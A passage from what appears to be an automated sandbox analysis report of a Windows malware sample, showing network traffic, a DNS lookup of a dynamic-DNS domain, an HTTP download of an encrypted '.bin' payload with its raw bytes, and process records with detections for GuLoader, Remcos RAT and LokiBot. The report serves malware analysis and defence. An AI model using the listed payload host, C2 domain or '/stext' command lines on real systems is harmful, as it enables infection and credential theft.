                                                                                                                                                                    Jan 2, 2022 02:28:02.698542118 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.698596954 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.698612928 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.698627949 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.698662996 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.698684931 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.698735952 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.698774099 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.698781967 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.698820114 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.794315100 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.794414997 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.794423103 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.794466972 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.794467926 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.794511080 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.794517994 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.794567108 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.794575930 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.794616938 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.794626951 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.794668913 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.794668913 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.794718027 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.794758081 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.794766903 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.794805050 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.794807911 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.797458887 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.797512054 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.797539949 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.797563076 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.797569990 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.797629118 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.797631025 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.797676086 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.797682047 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.797732115 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.797734022 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.797780037 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.797782898 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.797831059 CET4983580192.168.2.6147.189.137.168
                                                                                                                                                                    Jan 2, 2022 02:28:02.797856092 CET8049835147.189.137.168192.168.2.6
                                                                                                                                                                    Jan 2, 2022 02:28:02.797904015 CET4983580192.168.2.6147.189.137.168

                                                                                                                                                                    UDP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Jan 2, 2022 02:28:03.336359978 CET5662853192.168.2.68.8.8.8
                                                                                                                                                                    Jan 2, 2022 02:28:03.559317112 CET53566288.8.8.8192.168.2.6

                                                                                                                                                                    DNS Queries

                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                    Jan 2, 2022 02:28:03.336359978 CET192.168.2.68.8.8.80xd3aeStandard query (0)nhtaxfilling.ddnsgeek.comA (IP address)IN (0x0001)

                                                                                                                                                                    DNS Answers

                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                    Jan 2, 2022 02:28:03.559317112 CET8.8.8.8192.168.2.60xd3aeNo error (0)nhtaxfilling.ddnsgeek.com207.32.218.236A (IP address)IN (0x0001)

                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                    • 147.189.137.168

                                                                                                                                                                    HTTP Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                    0192.168.2.649835147.189.137.16880C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                    Jan 2, 2022 02:28:02.373486996 CET8008OUTGET /1040_RyQoPlW98.bin HTTP/1.1
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Host: 147.189.137.168
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Jan 2, 2022 02:28:02.499038935 CET8009INHTTP/1.1 200 OK
                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                    Last-Modified: Sat, 01 Jan 2022 18:55:36 GMT
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    ETag: "ff14be2941ffd71:0"
                                                                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                                                                    Date: Sun, 02 Jan 2022 01:27:24 GMT
                                                                                                                                                                    Content-Length: 474176
                                                                                                                                                                    Data Raw: a5 83 f2 18 e2 01 47 80 7b 48 56 0b 94 e4 ee fa 57 e3 9a 86 ea b5 07 7e f9 ae 3f a4 43 9c 7d db 34 90 9c 53 99 2d 09 5c 17 a9 43 9a 6b f6 84 4a 7d f0 ec 9a 4f 85 09 94 9c 28 d9 41 c6 f7 ce 09 58 d9 1b db 21 3a 8b b1 84 d8 73 2f 3b d9 b8 29 25 77 92 4d e8 b7 93 4f a4 73 75 4b 12 a2 dc 5a b7 fa fd fe e6 fa e3 18 f3 fc 3a 15 bc b6 a3 5f 77 3f f9 56 94 29 ab e6 75 c5 26 4e f5 de 4e d0 8c a4 99 c0 80 4c de af 55 4a e4 0a 7d 3a 64 8e da be 43 c8 c8 e0 91 18 40 f9 de f0 d4 76 c1 70 14 df 50 bb 34 26 4f a7 76 74 72 4f fe dc ec 86 40 ab ca f0 90 c8 94 b3 2b 5a 92 64 14 45 55 3b 4a 29 a7 f4 7d 7a 47 0f ce 99 0b 4d 27 61 12 59 49 16 f7 89 bc 89 d7 4a 31 f7 7f 16 fb a4 8f f7 15 47 a8 6c 04 1d 03 81 91 3c 0c 43 65 2b 96 2e 89 33 1e 98 dc 9b 89 67 9a 94 a3 ce c6 6b 06 92 9b 82 d9 d3 91 f4 89 40 b7 27 27 c7 3a 8f 98 fe 82 d2 6a 55 d2 a8 e2 d2 d4 a6 c7 fb fd e6 fe ee ee aa 35 26 58 98 17 a6 3d 48 24 32 ed 92 a8 df 65 a6 48 44 04 7f d0 72 87 e3 7a e8 49 59 b7 5b 8b 5e 13 39 95 3c 0b ec 89 d9 7d 85 9e 55 40 6a 5c d7 87 84 fb b3 5e 64 31 e0 80 a7 4a 5f 42 35 82 32 6e 9a dc d4 f4 76 85 3c 94 b2 9f 59 5c 3a 0a 6f bb 5e 5d b5 76 f4 4c c0 e5 b4 45 57 0d eb 0f 9c 88 47 53 b9 86 d0 65 3e 0f f4 d8 40 ae e7 c4 cb cc 3e 58 2d 69 67 82 dd 55 30 b7 76 1c 01 f7 99 50 3e d6 e5 a0 5c 3e d8 7d 54 fa cd 66 19 a3 64 cc 6b d5 7a 9c bc 0f d1 5a 17 b8 be 01 db a4 e7 3e ac ae b4 b4 36 5d c6 32 26 a5 c0 c0 4f a1 f8 c4 80 11 1c 04 9c 38 50 29 04 43 40 ec 6d 48 c2 91 f4 f9 27 d9 c9 d7 18 32 7c 42 be f6 66 a7 fd 38 d6 5f b9 48 9d 85 e9 78 59 32 0b 2d 85 d1 89 6c 1d fc 75 6c 8c fe d7 83 d9 57 ab 67 2d 16 64 59 6e 72 1d 66 82 4a 78 22 e4 95 d9 db 9b 3a 6d 80 68 04 1d 3c 77 00 15 6f ad 2c 15 87 3e fe e6 be 14 d7 84 83 44 e0 fb e7 fa 5d c2 4c d8 72 4c 74 88 a0 68 a8 d2 a4 dd be c0 5c 1f 70 ec d6 a8 29 d6 ad 25 d8 4b 0f dc af 2a b8 4e fe 71 f6 b6 46 2c 32 72 de bd bf f5 4a 58 68 fc fb 27 ad ab 0c b1 df 0d b6 d0 65 d0 66 0a 33 b5 be 4d 9d 79 ff 1f 0e fb b9 44 70 bd e4 b1 55 29 f0 64 7a 39 f7 b8 d4 4b 25 fe d6 f5 cd 36 bb 12 20 c1 18 b5 f9 f8 b9 01 18 86 47 4e 33 fb b4 d4 2e 26 ed 41 41 11 f3 7a 95 56 92 ee ae 86 55 a6 16 c1 0a 81 f1 68 ee 04 c6 48 61 b5 64 5f c8 a7 6f 90 dc a8 3e bf d4 2a 78 8d f1 17 1b 21 db 19 ea af 1e d6 7a 8c 9a ac 47 f9 fb cd b5 8e 0c 52 f8 6b 47 b0 91 f2 2e d8 15 53 06 f3 bf e5 40 5a 50 89 9b ce 24 7e 2c a5 70 be ad ff e5 a1 db b6 92 37 67 03 66 e0 1d 44 e4 2e cf be 87 bc 08 97 bc 5d 6e 2a db 28 f1 b9 2a 8d 76 cf 4c ec ec ff 92 c2 30 11 60 2d 21 14 5e a4 17 b4 8d de 32 0e b6 db 64 54 38 a8 55 03 d9 54 af 1f a2 c5 30 e6 ae 84 75 42 f9 08 90 ad 8b bb cc d7 a6 ba f5 1a b1 d9 6b b4 ae a8 5e 92 7a d9 5c 4f ce ed be 9f 0d 4a b7 46 9a b2 f2 d2 47 83 58 c6 14 e1 7d fc bd 62 a7 32 e6 0a a7 9d 47 bb 4d a9 9d 83 a2 dd 0a f8 4d d2 d0 d7 ea 42 66 ae 5a 1c 71 ee 53 77 ef 78 19 d1 93 32 92 de 05 c7 da 0b 2c c0 9a d2 bb e5 f7 5f 59 76 f5 15 83 8b db 22 3a 8b b1 80 d8 73 2f c4 26 b8 29 9d 77 92 4d e8 b7 93 4f e4 73 75 4b 12 a2 dc 5a b7 fa fd fe e6 fa e3 18 f3 fc 3a 15 bc b6 a3 5f 77 3f f9 56 94 29 ab e6 75 c5 26 4e fd df 4e d0 82 bb 23 ce 80 f8 d7 62 74 f2 e5 46 b0 1b 30 e6 b3 cd 63 b8 ba 8f f6 6a 21 94 fe 93 b5 18 af 1f 60 ff 32 de 14 54 3a c9 56 1d 1c 6f ba 93 bf a6 2d c4 ae 95 be c5 99 b9 0f 5a 92 64 14 45 55 3b 58 d4 da c0 2b e6 54 68 98 05 18 93 a5 1d 47 3e 43 43 1a
                                                                                                                                                                    Data Ascii: G{HVW~?C}4S-\CkJ}O(AX!:s/;)%wMOsuKZ:_w?V)u&NNLUJ}:dC@vpP4&OvtrO@+ZdEU;J)}zGM'aYIJ1Gl<Ce+.3gk@'':jU5&X=H$2eHDrzIY[^9<}U@j\^d1J_B52nv<Y\:o^]vLEWGSe>@>X-igU0vP>\>}TfdkzZ>6]2&O8P)C@mH'2|Bf8_HxY2-lulWg-dYnrfJx":mh<wo,>D]LrLth\p)%K*NqF,2rJXh'ef3MyDpU)dz9K%6 GN3.&AAzVUhHad_o>*x!zGRkG.S@ZP$~,p7gfD.]n*(*vL0`-!^2dT8UT0uBk^z\OJFGX}b2GMMBfZqSwx2,_Yv":s/&)wMOsuKZ:_w?V)u&NN#btF0cj!`2T:Vo-ZdEU;X+ThG>CC


                                                                                                                                                                    Code Manipulations

                                                                                                                                                                    Statistics

                                                                                                                                                                    Behavior

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    System Behavior

                                                                                                                                                                    General

                                                                                                                                                                    Start time:02:26:17
                                                                                                                                                                    Start date:02/01/2022
                                                                                                                                                                    Path:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\g4FtSOZMD9.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:258048 bytes
                                                                                                                                                                    MD5 hash:81F377EDA4163DA1B74CAE83E38CED9F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:Visual Basic
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.471018381.0000000002280000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    General

                                                                                                                                                                    Start time:02:27:06
                                                                                                                                                                    Start date:02/01/2022
                                                                                                                                                                    Path:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\g4FtSOZMD9.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:258048 bytes
                                                                                                                                                                    MD5 hash:81F377EDA4163DA1B74CAE83E38CED9F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.620873156.0000000001C23000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000009.00000003.582459498.0000000001C39000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000000.462063926.00000000017A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    General

                                                                                                                                                                    Start time:02:28:02
                                                                                                                                                                    Start date:02/01/2022
                                                                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                    Imagebase:0xe20000
                                                                                                                                                                    File size:44520 bytes
                                                                                                                                                                    MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high

                                                                                                                                                                    General

                                                                                                                                                                    Start time:02:28:15
                                                                                                                                                                    Start date:02/01/2022
                                                                                                                                                                    Path:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\iwxzjjveuvjtvtlo"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:258048 bytes
                                                                                                                                                                    MD5 hash:81F377EDA4163DA1B74CAE83E38CED9F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    General

                                                                                                                                                                    Start time:02:28:16
                                                                                                                                                                    Start date:02/01/2022
                                                                                                                                                                    Path:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\srdskbfyidbgfzzawoj"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:258048 bytes
                                                                                                                                                                    MD5 hash:81F377EDA4163DA1B74CAE83E38CED9F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    General

                                                                                                                                                                    Start time:02:28:16
                                                                                                                                                                    Start date:02/01/2022
                                                                                                                                                                    Path:C:\Users\user\Desktop\g4FtSOZMD9.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\Desktop\g4FtSOZMD9.exe /stext "C:\Users\user\AppData\Local\Temp\vtilcuqzwmtlifvenyefmr"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:258048 bytes
                                                                                                                                                                    MD5 hash:81F377EDA4163DA1B74CAE83E38CED9F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low

                                                                                                                                                                    Disassembly

                                                                                                                                                                    Code Analysis

                                                                                                                                                                    Reset < >